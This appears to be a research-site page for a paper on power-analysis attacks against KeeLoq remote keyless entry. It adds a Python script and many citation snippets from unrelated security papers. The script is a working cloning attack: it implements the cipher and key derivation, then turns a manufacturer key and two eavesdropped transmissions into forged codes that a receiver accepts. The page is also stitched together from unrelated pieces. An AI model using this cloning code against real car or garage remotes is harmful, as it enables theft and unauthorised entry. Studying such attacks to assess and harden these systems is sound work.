Conference Paper

On the Power of Power Analysis in the Real World: A Complete Break of the KeeLoq Code Hopping Scheme


Abstract

KeeLoq remote keyless entry systems are widely used for access control purposes such as garage openers or car door systems. We present the first successful differential power analysis attacks on numerous commercially available products employing KeeLoq code hopping. Our new techniques combine side-channel cryptanalysis with specific properties of the KeeLoq algorithm. They allow for efficiently revealing both the secret key of a remote transmitter and the manufacturer key stored in a receiver. As a result, a remote control can be cloned from only ten power traces, allowing for a practical key recovery in a few minutes. After extracting the manufacturer key once, with similar techniques, we demonstrate how to recover the secret key of a remote control and replicate it from a distance, just by eavesdropping on at most two messages. This key cloning without physical access to the device has serious real-world security implications, as the technically challenging part can be outsourced to specialists. Finally, we mount a denial-of-service attack on a KeeLoq access control system. All proposed attacks have been verified on several commercial KeeLoq products.
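The chain the abstract describes, from one recovered manufacturer key to a cloned remote, is easiest to follow in code. The Python below is an added example written for this page; it is not code from the paper, its authors, or Microchip. It implements the public KeeLoq block cipher (528 rounds, NLF 0x3A5C742E), the "normal learning" device-key derivation as this example assumes it from Microchip's documentation (the 28-bit serial padded with 0x2 and 0x6 is decrypted under the manufacturer key; those padding constants and the derivation mode are assumptions here), and a deliberately simplified 32-bit hopping-code layout (16-bit counter, 12-bit discrimination, 4-bit button). The manufacturer key, serial and counter values are constructed. The DPA step that recovers the manufacturer key from a receiver's power traces is taken as already done; what the code shows is the consequence the abstract warns about: holding that key and one or two eavesdropped transmissions, an attacker re-derives the remote's device key, reads its counter, and emits the next valid code without ever touching the fob.

```python
# Added example (not from the paper): KeeLoq cipher + code-hopping key derivation,
# showing how a recovered manufacturer key turns eavesdropping into fob cloning.

NLF = 0x3A5C742E      # KeeLoq non-linear function as a 32-entry truth table
ROUNDS = 528
MASK32 = 0xFFFFFFFF


def _nlf(x, taps):
    """Evaluate the NLF on five bits of x; taps are given MSB-first."""
    idx = 0
    for t in taps:
        idx = (idx << 1) | ((x >> t) & 1)
    return (NLF >> idx) & 1


def keeloq_encrypt(block, key):
    """528-round KeeLoq encryption of a 32-bit block under a 64-bit key."""
    x = block & MASK32
    for i in range(ROUNDS):
        bit = (x & 1) ^ ((x >> 16) & 1) ^ _nlf(x, (31, 26, 20, 9, 1)) \
            ^ ((key >> (i % 64)) & 1)
        x = (x >> 1) | (bit << 31)
    return x


def keeloq_decrypt(block, key):
    """Inverse of keeloq_encrypt: the shift register run backwards."""
    x = block & MASK32
    for i in range(ROUNDS):
        bit = ((x >> 31) & 1) ^ ((x >> 15) & 1) ^ _nlf(x, (30, 25, 19, 8, 0)) \
            ^ ((key >> ((15 - i) % 64)) & 1)
        x = ((x << 1) & MASK32) | bit
    return x


def derive_device_key(manufacturer_key, serial):
    """'Normal learning' derivation (assumed here from Microchip's documentation):
    the 28-bit serial padded with 0x2 / 0x6 in the top nibble is DEcrypted under
    the manufacturer key to yield the low / high halves of the device key."""
    serial &= 0x0FFFFFFF
    low = keeloq_decrypt(0x20000000 | serial, manufacturer_key)
    high = keeloq_decrypt(0x60000000 | serial, manufacturer_key)
    return (high << 32) | low


# Simplified hopping-code plaintext (assumption of this example): bits 0-15 sync
# counter, bits 16-27 discrimination (low 12 serial bits), bits 28-31 button.
def build_hop(counter, serial, button):
    return ((button & 0xF) << 28) | ((serial & 0xFFF) << 16) | (counter & 0xFFFF)


def parse_hop(plain):
    return plain & 0xFFFF, (plain >> 16) & 0xFFF, (plain >> 28) & 0xF


class Transmitter:
    """A remote whose device key was derived from the manufacturer key at production."""

    def __init__(self, manufacturer_key, serial, counter=0):
        self.serial, self.counter = serial & 0x0FFFFFFF, counter & 0xFFFF
        self.key = derive_device_key(manufacturer_key, serial)

    def press(self, button):
        self.counter = (self.counter + 1) & 0xFFFF
        hop = keeloq_encrypt(build_hop(self.counter, self.serial, button), self.key)
        return (self.serial, button, hop)        # serial and button travel in the clear


def receiver_accepts(manufacturer_key, last_counter, msg, window=16):
    """Receiver: re-derive the device key from the cleartext serial, check the
    discrimination and button, and accept only a counter up to `window` steps ahead."""
    serial, button, hop = msg
    key = derive_device_key(manufacturer_key, serial)
    counter, disc, btn = parse_hop(keeloq_decrypt(hop, key))
    if disc != (serial & 0xFFF) or btn != button:
        return False
    return 0 < ((counter - last_counter) & 0xFFFF) <= window


def clone_from_eavesdropping(manufacturer_key, messages):
    """Attacker step after the DPA (not shown): from the manufacturer key and one or
    two captured transmissions, recover the remote's device key and current counter.
    The discrimination/button check, and with two messages the counter stepping by
    exactly one, confirm that the assumed derivation mode matches this remote."""
    serial = messages[0][0]
    key = derive_device_key(manufacturer_key, serial)
    counters = []
    for ser, button, hop in messages:
        counter, disc, btn = parse_hop(keeloq_decrypt(hop, key))
        if ser != serial or disc != (serial & 0xFFF) or btn != button:
            return None
        counters.append(counter)
    if len(counters) == 2 and (counters[1] - counters[0]) & 0xFFFF != 1:
        return None
    return Transmitter(manufacturer_key, serial, counters[-1])


def demo():
    mk = 0x0123456789ABCDEF                       # constructed manufacturer key (the DPA target)
    victim = Transmitter(mk, serial=0x0ABCDEF, counter=1000)
    captured = [victim.press(0x2), victim.press(0x2)]   # two eavesdropped button presses
    clone = clone_from_eavesdropping(mk, captured)
    forged = clone.press(0x2)                     # next valid code, produced from a distance
    accepted = receiver_accepts(mk, victim.counter, forged)
    matches_victim = forged == victim.press(0x2)  # identical to what the real fob sends next
    return accepted, matches_victim               # -> (True, True)


if __name__ == "__main__":
    print(demo())
```

The receiver's counter window rejects a straight replay of a captured code, which is the property code hopping was designed for; it does nothing against an attacker who can compute the next code, which is exactly what a leaked manufacturer key grants for every remote of that product line. The second captured message is only needed to confirm the derivation guess: a wrong manufacturer key, or a remote provisioned in a different learning mode, fails the discrimination check or the counter-step check and yields no clone.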


... Once the private key is known, all encryptions carried out via this key-pair can effortlessly be read out by the adversary. There already exist dozens of approaches, such as physical key extraction or viruses, which have been successfully applied to attack such systems [1][2][3]. ...
... This transformation is mostly insensitive to the aforementioned effects and can furthermore be used to scale down the image. An example of how these transformed images may look can be found in Figure 3.1. Using the value 0 as a threshold, the Gabor-transformed image is further transformed into a 2D binary array, which is flattened to a 1D bitstring and finally represents the response of the PUF. ...
... This prevents directly vertically or horizontally neighboring blocks from being activated simultaneously and is hoped to increase the overall decorrelation between responses, as the simulation shows that the influence on the speckle pattern appears to be smaller when light travels through neighboring pixels, compared to locally unrelated pixels. The corresponding datasets will be called type B. An example of how such a challenge could look in comparison to one without restrictions can be found in Figure 4.1. The other restriction will be to define an upper boundary for how many blocks can be activated simultaneously, while there is no local restriction on which blocks these can be. ...
Preprint
Full-text available
In this thesis, several linear and non-linear machine learning attacks on optical physical unclonable functions (PUFs) are presented. To this end, a simulation of such a PUF is implemented to generate a variety of datasets that differ in several factors in order to find the best simulation setup and to study the behavior of the machine learning attacks under different circumstances. All datasets are evaluated in terms of individual samples and their correlations with each other. In the following, both linear and deep learning approaches are used to attack these PUF simulations and comprehensively investigate the impact of different factors on the datasets in terms of their security level against attackers. In addition, the differences between the two attack methods in terms of their performance are highlighted using several independent metrics. Several improvements to these models and new attacks will be introduced and investigated sequentially, with the goal of progressively improving modeling performance. This will lead to the development of an attack capable of almost perfectly predicting the outputs of the simulated PUF. In addition, data from a real optical PUF is examined and both compared to that of the simulation and used to see how the machine learning models presented would perform in the real world. The results show that all models meet the defined criterion for a successful machine learning attack.
Thesis
Full-text available
In this thesis, several linear and non-linear machine learning attacks on optical physical unclonable functions (PUFs) are introduced. For this purpose, a simulation of such a PUF is implemented to generate a variety of datasets that differ in several factors, to find the superior simulation setup, as well as to investigate the behaviors of the machine learning attacks under different circumstances. The main focus lies on the number of bits of the applied challenges and multiple challenge restrictions, which are intended to increase the input-output complexity of the simulated PUF. All the datasets are evaluated with respect to the individual samples and their correlations among each other. In the following, both linear and deep learning approaches are used to attack these PUF simulations to comprehensively study the influence of the varying factors on the datasets with respect to their security level against adversaries. An additional focus will lie on the different behaviors of both attacking methods, i.e. the major differences in their performances and which approach should be preferred under which circumstances. Several independent metrics are used to highlight these differences from varying perspectives. Furthermore, multiple enhancements to these first machine learning models and new attacks that fall into the two categories will successively be introduced and investigated, while aiming for gradually better modeling performances. This leads to the development of an attack that is able to almost perfectly predict the outputs of the simulated PUF. Also, data from a real optical PUF will be investigated and compared to those from the simulation. This data is further used to see how the introduced machine learning models would perform in the real world. Here, quite impressive results could be found, such that all the models fulfilled the defined criterion for a successful machine learning attack.
For all the datasets, there are quite large differences between both the linear and non-linear attacking approaches, which this thesis will try to thoroughly elaborate on and give further insights into the benefits of differing architectures.
... In the existing adversary models presented in [42,[44][45][46][47][48][49][50][51][52], the communication channel between the communicating parties can be controlled by the adversary, who can initiate malicious operations, such as intercepting, eavesdropping on, and modifying transport messages. In terms of the forward secrecy, A can also be admitted and corrupt valid parties to obtain long-term keys. ...
Article
Full-text available
The rapid development of mobile computing (e.g., mobile health, mobile payments, and smart homes) has brought great convenience to our lives. It is well-known that the security and privacy of user information from these applications and services is critical. Without the prevention provided by an authentication mechanism, safety vulnerabilities may accumulate, such as illegal intrusion access resulting in data leakage and fraudulent abuse. Luckily, two-factor authentication (2FA) protocols can secure access and communication for mobile computing. As we understand it, existing 2FA authentication protocols weaken security in the pursuit of high efficiency. How efficiency can be achieved while preserving the protocol's security remains a challenge. In this study, we designed a robust and effective 2FA protocol based on elliptic curve cryptography (ECC) for authentication of users and service providers. We proved the robustness (respectively, the effectiveness) of the presented protocol with the heuristic analysis and security verification provided by the ProVerif tool (respectively, with a performance comparison based on six schemes). Performance comparisons in terms of message rounds, communication, and computation overheads showed that our scheme was superior to the existing schemes or comparable as a whole; i.e., only two rounds, 1376 bits, and 1.818 ms were required in our scheme, respectively. The evaluation results showed that the proposed 2FA protocol provides a better balance between security and availability compared to state-of-the-art protocols.
... A wide range of applications, from business to government and military uses, may be realized with secure and continuous user access to designated smart home appliances [17]. Due to the sensitive nature of the operations and inherited vulnerabilities of the public channel, such as real-time data manipulation, clogging, replay, jamming, etc., the use of these smart home appliances for such applications is otherwise regarded as problematic [18,19]. Although various security schemes for the smart-home environment have recently been developed, many of these schemes have turned out to be insecure or unworkable. ...
... 3. The is under the user's possession, and any wicked intruder cannot control it [37]. [17][18][19], Refs. [20][21][22] is considered in this article, where the adversary has the subsequent capabilities: 2. Public/open channel communication fully controlled by the T . ...
Article
Full-text available
For the betterment of human life, smart Internet of Things (IoT)-based systems are needed for the new era. IoT is evolving swiftly for its applications in the smart environment, including smart airports, smart buildings, smart manufacturing, smart homes, etc. A smart home environment includes resource-constrained devices that are interlinked, monitored, controlled, and analyzed with the help of the Internet. In a distributed smart environment, devices with low and high computational power work together and require authenticity. Therefore, a computationally efficient and secure protocol is needed. The authentication protocol is employed to ensure that authorized smart devices communicate with the smart environment and are accessible by authorized personnel only. We have designed a novel, lightweight secure protocol for a smart home environment. The introduced novel protocol can withstand well-known attacks and is effective with respect to computation and communication complexities. Comparative, formal, and informal analyses were conducted to draw the comparison between the introduced protocol and previous state-of-the-art protocols.
... A can replay and/or send forged messages. A can also stop any message transmitted on the communication channel [30,31,32]. Using power analysis, A can interpret the leaked data from a physically captured drone and from a stolen smart card [25,32]. ...
... Let U m be a registered valid user of the system whose smart device is accidentally stolen by an attacker U A, who can be an insider or an outsider. The adversary U A can retrieve the sensitive information {RID m , ID DRn , T C u , A , B, C, τ m , Gen(·), Rep(·), h(·), t} from the mobile device through power analysis [30,34]. However, U A cannot extract the unique parameters ...
Article
The Internet of drones (IoD) is a very useful application of the Internet of things (IoT) and it can help the daily life comfort through various functions including the smart city surveillance. The IoD can enhance the comfort to reach inaccessible and hard to access sites and can save lot of effort, time and cost. However, in addition to traditional threats, the IoD may suffer from new threats and requires customized methods to combat the security weaknesses. Very recently, Wazid et al. proposed a security solution for securing IoD application scenario and claimed its security. However, in this paper we show that their scheme cannot resist stolen verifier and traceability attacks. Moreover, an attacker with access to the verifier, can impersonate any user, drone or server of the system. An enhanced scheme is then proposed to cope with these weaknesses. The security claims of proposed scheme are endorsed by formal and informal security analysis. Moreover, the performance and security comparisons show that proposed scheme completes a cycle of authentication with a slight increase in computation time, but it offers all the required security features as compared with the scheme of Wazid et al.
... Many scholars [26][27][28][29][30][31][32][33][34][35][36][37][38][39][40][41][42][43] have studied the attacker model of password authentication protocol, among which the Dolev-Yao model [31] is the most classic. Due to the openness of the network, side channel attacks have developed rapidly in recent years (such as timing attacks, electromagnetic attacks and energy consumption attacks). ...
... Side-channel attack means that the attacker has strong ability and can extract security parameters stored in smart devices (e.g., smart cards). When analyzing the authentication protocol in GLOMONET, this paper will adopt a new attack model which combines multiple attack models, such as those presented in reported works [26,27,[32][33][34][35][36][37][38][39][40][41][42][43][44][45][46][47]. Finally, the capacities of the adversary for two-factor authentication schemes in GLOMONET are summarized as follows. ...
Article
Full-text available
Designing a secure and efficient anonymous authentication protocol for roaming services in global mobile networks is a hot topic in the field of information security protocols. Based on the widely accepted attacker model, this paper analyzes the security of three representative anonymous authentication protocols in global mobile networks. It is pointed out that: (1) Xu et al.'s protocol cannot resist the claimed offline password guessing attack and mobile user impersonation attack, and does not achieve mobile user untraceability and forward security; (2) Gupta et al.'s protocol cannot resist offline password guessing attacks and temporary information disclosure attacks; (3) Madhusudhan et al.'s protocol cannot resist mobile user impersonation attack, foreign agent impersonation attack, replay attack, offline password guessing attack and session key disclosure attack, and cannot realize the anonymity, untraceability and forward security of users. It is emphasized that the fundamental reason for the failure of these protocols lies in the violation of the four basic principles of protocol design: Public key principle, Forward security principle, User anonymity principle and Anti offline guessing attack principle. The specific mistakes of these schemes are clarified, and the corresponding correction methods are proposed.
Qiu S, Wang D. Revisiting three anonymous two-factor authentication schemes for roaming service in global mobility networks. J Surveill Secur Saf 2021;2:66-82. http://dx.doi.org/10.20517/jsss.2020.28
... Also, it can be initiated by capturing the key fob signal and redirecting it to the vehicle. For example, in [52] researchers were able to break the key fob block cipher and perform a relay signal attack, and were able to lock and unlock doors. The attacker needs to be in the range of the key fob to be able to intercept the signal for this type of attack. ...
... Other examples include remote attacks carried out on a Jeep Cherokee [43]. Another attack is the keyless fob attack used to forcibly unlock the doors of a vehicle [52]. A summary of in-vehicle network based attacks includes: Table 4 identifies some of the attacks initiated ...
Article
Full-text available
As connectivity between and within vehicles increases, so does concern about safety and security. Various automotive serial protocols are used inside vehicles such as Controller Area Network (CAN), Local Interconnect Network (LIN), and FlexRay. CAN Bus is the most used in-vehicle network protocol to support exchange of vehicle parameters between Electronic Control Units (ECUs). This protocol lacks security mechanisms by design and is therefore vulnerable to various attacks. Furthermore, connectivity of vehicles has made the CAN Bus vulnerable not only from within the vehicle but also from outside. With the rise of connected cars, more entry points and interfaces have been introduced on board vehicles, thereby also leading to a wider potential attack surface. Existing security mechanisms focus on the use of encryption, authentication, and vehicle Intrusion Detection Systems (IDS), which operate under various constraints such as low bandwidth, small frame size (e.g., in the CAN protocol), limited availability of computational resources, and real-time sensitivity. We survey and classify current cryptographic and IDS approaches and compare these approaches based on criteria such as real-time constraints, types of hardware used, changes in CAN Bus behaviour, types of attack mitigation, and software/hardware used to validate these approaches. We conclude with the limitations of these mitigation strategies and research challenges for the future.
... In which the adversary A has more capabilities as compared with the D-Y model [31]. A under the eCK model [32] has authority over the public channel and can perform any task including sending, receiving/listening, forging and blocking a legitimate message. A can expose the information stored on a captured SM [32]. ...
... A under the eCK model [32] has authority over the public channel and can perform any task including sending, receiving/listening, forging and blocking a legitimate message. A can expose the information stored on a captured SM [32]. A has access to all public information and SMs are not trusted, which means a dishonest SM can act as an attacker. ...
Conference Paper
Recently, in 2019, Kumar et al. (IEEE Transactions on Smart Grid 10.4 (2018): 4349-4359) proposed an ECC-based lightweight authentication and key agreement scheme (LAKA) to secure the communication between a smart meter (SM) and a neighbourhood area network (NAN) gateway. The LAKA scheme was proved as secure and efficient as per the comparisons performed by Kumar et al. Specifically, it was argued through security analysis that LAKA provides anonymity and resistance to related attacks. However, the specific analysis in this paper contradicts their claim and it is shown here that, in addition to an ephemeral secret leakage attack and a lack of untraceability, LAKA is also vulnerable to a stolen verifier attack.
... As per the CK-adversary model, an adversary can also compromise the confidential credentials and the session keys and states in the sessions. Additionally,  can also capture the smart devices and perform a power analysis attack [34,35] to obtain stored information. As per the eCK model, the attacker is also allowed to launch a critical compromise impersonation attack. ...
... Assume that  is a privileged insider and can apprehend the of after the registration. Now  can read all the stored information in the though power analysis [34,35,42]. But to acquire any secret parameter from ,  requires the knowledge of , and . ...
Article
Fog computing (FC) is an infrastructure consisting of decentralized computing, where computing resources such as storage, applications, and data are scattered among the cloud and data source. Fog computing inherits similar privacy and security concerns present in cloud computing, such as authentication and key management issues. Recently, Wazid et al. presented a scheme of authentication key exchange for fog computing called SAKA-FC to address these issues. We analyzed and identified that SAKA-FC suffers from some severe vulnerabilities. Furthermore, we presented an improved scheme to mitigate these problems while retaining its strengths. The formal security analysis of the proposed scheme is validated through BAN logic. At the same time, the AVISPA tool is employed for automated formal security verification. Informal security analysis is conducted to attest that the proposal can confront the known attacks. Using computation and communication costs as the metrics, the proposed scheme is also compared with some state-of-the-art schemes. The proposed scheme achieves the same communication cost as SAKA-FC, whereas the difference in computation cost is 24%. This increase in computation cost is justifiable as the proposal is resistant to clogging attacks and provides better security than the prior schemes.
... The RF blaster contains a security code that is paired with the IoT device; this means the current security code is preserved even during power loss, and subsequent reconfiguration is unnecessary. The RF blaster uses the KeeLoq algorithm [22] which transmits 66 data bits: 34 unencrypted, and 32 encrypted using a rolling code. A rolling code transmitter provides a secure encrypted RF transmission comprised of the rolling code and an interleaved trinary bit-fixed code. ...
... Using artillery.io [22], we compared the latency of these infrastructures over tasks suited to our device's blockchain use cases. ...
Article
Our paper presents a novel fire prevention system based on the Internet of Things (IoT) that uses the Ethereum distributed ledger (blockchain) to build a verifiable record of fire risk events. Our proposed system can operate off- and online and does not require additional electrical installation, thereby lowering homeowner costs. The device plugs into the stove’s outlet, and when smoke is detected, the device discontinues electricity to the stove and informs the homeowner via a smartphone notification. The homeowner can restore electricity through a wireless button located close to the stove. The system uses a webservice based on Google Firebase to establish connection between the IoT device and the smartphone. Our system uses a Smart Contract (SC) engraved in the blockchain to register trigger events from the IoT device and its sensor. We use a virtual Ethereum node supported by Infura infrastructure to provide stability when an event is published. Apps are available for Android and iOS devices that allow a homeowner to control and turn off their stove and receive alerts about the state of the sensors. We propose a 950–50 ms sleep–wake cycle configuration for the IoT module to limit power consumption. Our configurations allow our system to consume on average only 9.8 mW. Our product is an innovative achievement for fire prevention systems.
... During the registration procedure, the TA stores the values {ID V , TID V , A V , P K s } in the memory of VH without adopting any cryptographic methods. Moreover, under the threat model of Xu et al.'s scheme (Section 1.2), an adversary A can easily extract these values by power analysis attacks [18,19]. Based on this attack, A could easily perform impersonation attacks and compromise the privacy of users. ...
Article
Full-text available
In the Internet of Vehicles (IoV) environments, vehicles and roadside units (RSUs) communicate predominantly through public channels. These vehicles and RSUs exchange various data, such as traffic density, location, speed, etc. Therefore, secure and efficient authentication and key establishment (AKE) are needed to guarantee user privacy when exchanging data between vehicles and RSUs. Recently, a secure and computationally efficient AKE scheme has been proposed to construct secure IoV environments. In their research, the authors asserted that their AKE scheme provides comprehensive security properties, protecting against various potential threats while simultaneously ensuring session key integrity and robust mutual authentication. This paper proves that the previous scheme does not prevent various attacks, using logical and mathematical analyses. Moreover, we demonstrate that this scheme does not meet the essential security requirements and correctness of security assumptions. We perform the simulation proof using AVISPA, which is well known as a formal verification tool. To enhance the resilience against attacks, we propose solutions aimed at developing more robust and efficient AKE for IoV environments.
... Moreover, an adversary cannot speculate on the secret parameters (secret key, nonce, random number, etc.) in polynomial time because of its large size. Finally, an adversary can obtain data stored in embedded devices that are not equipped with detailed tamper-proof techniques [20][21][22]. ...
Article
Full-text available
The Internet of Things (IoT) with cloud services are important functionalities in the latest IoT systems for providing various convenient services. These cloud-enabled IoT environments collect, analyze, and monitor surrounding data, resulting in the most effective handling of large amounts of heterogeneous data. In these environments, secure authentication with a key agreement mechanism is essential to ensure user and data privacy when transmitting data between the cloud server and IoT nodes. In this study, we prove that the previous scheme contains various security threats, and hence cannot guarantee essential security requirements. To overcome these security threats, we propose an improved authentication and key agreement scheme for cloud-enabled IoT using PUF. Furthermore, we evaluate its security by performing informal, formal (mathematical), and simulation analyses using the AVISPA tool and ROR model. The performance and security properties of our scheme are subsequently compared with those of other related schemes. The comparison confirms that our scheme is suitable for a practical cloud-enabled IoT environment because it provides a superior security level and is more efficient than contemporary schemes.
... The key generation center (KGC) is a fully trusted entity because it generates and manages the secret key for UEs and MTC devices (MDs). However, UEs and MDs are not physically protected and an adversary can obtain the data in the memory of UEs and MDs using power analysis attack [10,15,16]. ...
Article
Full-text available
The Internet of Things (IoT) and 5G networks play important roles in the latest systems for managing and monitoring various types of data. These 5G-based IoT environments collect various data in real time using micro-sensors as IoT devices and send the collected data to a server for further processing. In this scenario, a secure authentication and key agreement scheme is needed to ensure privacy when exchanging data between IoT nodes and the server. Recently, Cao et al. in "LSAA: A lightweight and secure access authentication scheme for both UE and mMTC devices in 5G networks" presented a new authentication scheme to protect user privacy. They contend that their scheme not only prevents various protocol attacks, but also achieves mutual authentication, session key security, unlinkability, and perfect forward/backward secrecy. This paper demonstrates critical security weaknesses of their scheme using informal and formal (mathematical) analysis: it does not prevent a single point of failure and impersonation attacks. Further, their proposed scheme does not achieve mutual authentication and correctness of security assumptions, and we perform simulation analysis using a formal verification tool to demonstrate its security flaws. To ensure attack resilience, we put forward some solutions that can assist in constructing a more secure and efficient access authentication scheme for 5G networks.
... Indeed, their ability to rely on the accidental transmission of information via environmental parameters of the working regime of a computing device allows them to retrieve confidential information from fully functional cryptographic implementations. Since the work of Kocher [37], where the power consumption of a smartcard was employed to derive the secret key of the DES cipher running on it, side channel attacks were used to breach the security of a large variety of devices, ranging from inexpensive microcontrollers for IoT devices and RFIDs [21], [46], [50] through mid-range system on chips [7], [9] to full desktop and laptop grade CPUs [24], [25], [36], [39], [45]. ...
Article
Full-text available
Power consumption and electromagnetic emissions analyses are well established attack avenues for secret value extraction in a large range of embedded devices. Countermeasures against these attacks are approached at different levels, from modified logic styles to changes in the software implementations. In this work, we propose a microarchitectural modification to a compact RISC-V SoC, the OpenTitan open source silicon root of trust, providing a code morphing countermeasure against power and electromagnetic emissions side channel attacks. Our approach allows the countermeasure to be applied transparently, without the need for any software modification to the cryptographic primitive running on OpenTitan. Our microarchitectural integration of a morphing engine also allows us to provide transparent protection to memory operations. We validate our approach through measurements on an actual FPGA prototype on a Xilinx Artix-7. Our integrated morphing engine increases the FPGA resource consumption by less than 8%, plus the resources required by an RNG of choice, with respect to the original OpenTitan SoC. Our design shows a side channel attack resistance improvement of at least 250× in the Measurements-To-Disclose metric with respect to the unprotected design. We benchmark the performance of our proposed architecture on all the ISO/IEC standard symmetric block ciphers, including, among the others, AES, reducing the execution time overhead by 21× to 141× with respect to a continuously morphing software solution.
... The simulated attack model in this paper is considered as per assumptions mentioned in [23][24][25][26][27][28][29] and described as follows: ...
Article
Internet of drones (IoD) has gained significant importance in recent times due to its applications in several critical domains ranging from commercial to defense and rescue operations. With several drones flying in different zones to carry out specified tasks, the IoD can be beneficial to gather the real time data for interpretation by the users. However, the data access is carried out through an open channel and battery operated drones. Therefore, the drones’ security and privacy are crucial for accomplishing mission-critical, safety-critical, or surveillance operations. In 2020, Bera et al. presented a certificate based access control scheme for securing the IoD access and argued the scheme’s security through formal and informal methods. However, the analysis presented in this paper shows that the scheme of Bera et al. does not provide anonymity and is insecure against multiple threats, including drone impersonation, the man in the middle, and replay attacks. We then designed a generic certificate based access control scheme to provide inter-drone and drone to ground station access control/authentication scheme in the IoD domain (GCACS-IoD). The GCACS-IoD is provably secure against the known attacks and provides anonymity. GCACS-IoD extends security while preserving computation and communication efficiencies.
... SCA attacks belong to the most serious threats to embedded crypto devices and often target the secret (cryptographic) key in a device that keeps personal data and communications secure [11], [26] or even white-box implementations [13]. There are many examples of SCA attacks in the real-world such as [9], [23], [57] and more recent ones [20], [37], [56]. ...
... Since then multiple side channels have been demonstrated, exploiting various effects, such as timing [1,11,20,21], power consumption [56], electromagnetic (EM) emanations [22,39,69], shared microarchitectural components [43,78], and even acoustic and photonic emanations [4,44,58,73]. These side channels pose a severe risk to the security of systems, and in particular to cryptographic implementations, and effective side-channel attacks have been demonstrated against block and stream ciphers [47,70], public-key systems, both traditional [30,65] and post quantum [68], cryptographic primitives implemented in real-world devices [5,35], and even non-cryptographic algorithms [8]. ...
... We often also say that the two use different side-channel distinguishers. Side-channel attacks using the above three techniques have been reported on a wide variety of cryptographic implementations, see, e.g., [154,402,410,412,434,500] including some real-world applications [196]. ...
Chapter
Full-text available
Side-channel attacks (SCAs) are powerful attacks based on the information obtained from the implementation of cryptographic devices. Profiling side-channel attacks has received a lot of attention in recent years due to the fact that this type of attack defines the worst-case security assumptions. The SCA community realized that the same approach is actually used in other domains in the form of supervised machine learning. Consequently, some researchers started experimenting with different machine learning techniques and evaluating their effectiveness in the SCA context. More recently, we are witnessing an increase in the use of deep learning techniques in the SCA community with strong first results in side-channel analyses, even in the presence of countermeasures. In this chapter, we consider the evolution of profiling attacks, and subsequently we discuss the impacts they have made in the data preprocessing, feature engineering, and classification phases. We also speculate on the future directions and the best-case consequences for the security of small devices.
... This was revealed at a hacking conference [78], and the surprising part is that Windows XP used the same cipher on some of its registry keys, as found in [137]. Some of the famous examples that were leaked or reverse-engineered and then attacked are RC4 [228], DST [114], KeeLoq [43,168,173,264], and Megamos [340]. Note that we list these algorithms because they are examples of trusted ciphers that were later attacked. ...
Thesis
Full-text available
Living in an era where new devices are astonishing considering their high capabilities, new visions and terms have emerged. The move to smart phones, Wireless Sensor Networks, high-resolution cameras, pads and much more has mandated the need to rethink the technological strategy that is used today. Starting from social media, where apparently everything is being exposed, moving to highly powerful surveillance cameras, in addition to real time health monitoring, it can be seen that a high amount of data is being stored in the Cloud and on servers. This introduced a great challenge for their storage and transmission, especially on resource-limited platforms that are characterized by: (a) limited computing capabilities, (b) limited energy and source of power and (c) open infrastructures that transmit data over unreliable wireless networks. One of the extensively studied platforms is the Vehicular Ad-hoc Network, which tends to have many limitations concerning the security field. In this dissertation, we focus on improving the security of transmitted multimedia contents in different limited platforms, while preserving a high security level. Limitations of these platforms are taken into consideration while enhancing the execution time of the secure cipher. Additionally, if the proposed cipher is to be used for images, the intrinsic voluminous and complex nature of the managed images is also taken into account. In the first part, we surveyed one of the limited platforms that is interesting for many researchers, which is the Vehicular Ad-hoc Network. In order to pave the way for researchers to find new efficient security solutions, it is important to have one reference that sums up most of the recent works. It investigates almost every aspect of this field, shedding light on the different aspects this platform possesses.
Then, in order to propose any new security solution and validate its robustness and the level of randomness of the ciphered image, a simple and efficient test is proposed. This test uses the randomness tools TestU01 and PractRand in order to assure a high level of randomness. After running these tests on well known ciphers, some flaws were exposed. Proceeding to the next part, a novel proposal for enhancing the well-known ultra lightweight cipher scheme, Speck, is proposed. The main contribution of this work is to obtain a better version compared to Speck. In this proposal, the 26 rounds of Speck were reduced to 7 rounds in Speck-R while improving the execution time by at least 50%. First, we validate that Speck-R passes the randomness tests proposed previously. Additionally, a dynamic substitution layer adds more security against key related attacks and highly fortifies the cipher. Speck-R was implemented on different limited Arduino chips and in all cases, Speck-R was ahead of Speck. Then, in order to prove that this cipher can be used for securing images, especially in VANETs/IoV, where images can be extensively re/transmitted, several tests were carried out and the results showed that Speck-R indeed possesses the high level of security desired in any trusted cipher. Extensive experiments validate our proposal from both the security and performance points of view and demonstrate the robustness of the proposed scheme against the best-known types of attacks.
... In the beginning, automotive security mainly concerned the locking systems and immobilizers because of the usage of keyless entry systems [9]. Many studies have demonstrated the possibility to access the system without permission [10][11][12][13][14]. With the increasing connectivity of vehicles, the external communication can be seen as new attack surfaces in modern vehicles. ...
Article
Full-text available
As intelligent car-networking represents the new direction of future vehicular development, automotive security plays an increasingly important role in the whole car industry chain. Provided that the accompanying security problems are addressed, vehicles will provide more convenience while ensuring safety. Security models can be utilized as tools to reason about the security of the automotive system and represent it in a structured manner. It is essential to improve the knowledge about security models by comparing them, besides proposing new methods. This paper aims to give a comprehensive introduction to the topic of security models for the Intelligent Transport System (ITS). A survey of the current methodologies for security modeling is conducted and a classification scheme is subsequently proposed. Furthermore, the existing frameworks and methods to build automotive security models are broadly examined according to the features of automotive electronic systems. A number of fundamental aspects are defined to compare the presented methods in order to comprehend automotive security modeling in depth.
Preprint
Full-text available
We introduce screen gleaning, a TEMPEST attack in which the screen of a mobile device is read without a visual line of sight, revealing sensitive information displayed on the phone screen. The screen gleaning attack uses an antenna and a software-defined radio (SDR) to pick up the electromagnetic signal that the device sends to the screen to display, e.g., a message with a security code. This special equipment makes it possible to recreate the signal as a gray-scale image, which we refer to as an emage. Here, we show that it can be used to read a security code. The screen gleaning attack is challenging because it is often impossible for a human viewer to interpret the emage directly. We show that this challenge can be addressed with machine learning, specifically, a deep learning classifier. Screen gleaning will become increasingly serious as SDRs and deep learning continue to rapidly advance. In this paper, we demonstrate the security code attack and we propose a testbed that provides a standard setup in which screen gleaning could be tested with different attacker models. Finally, we analyze the dimensions of screen gleaning attacker models and discuss possible countermeasures with the potential to address them.
... As declared in [29][30][31][32][33][34][35][36][37], the same threat model is acknowledged in this article, in which, according to the abilities of the attacker (), the following steps are taken: ...
Article
